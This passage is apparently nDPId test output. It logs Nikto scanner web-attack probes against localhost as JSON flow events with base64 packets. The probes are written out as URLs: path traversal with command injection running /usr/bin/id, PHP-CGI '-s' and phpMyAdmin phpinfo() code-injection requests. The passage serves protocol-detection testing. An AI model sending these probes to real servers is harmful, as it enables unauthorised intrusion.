(Test:003302)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 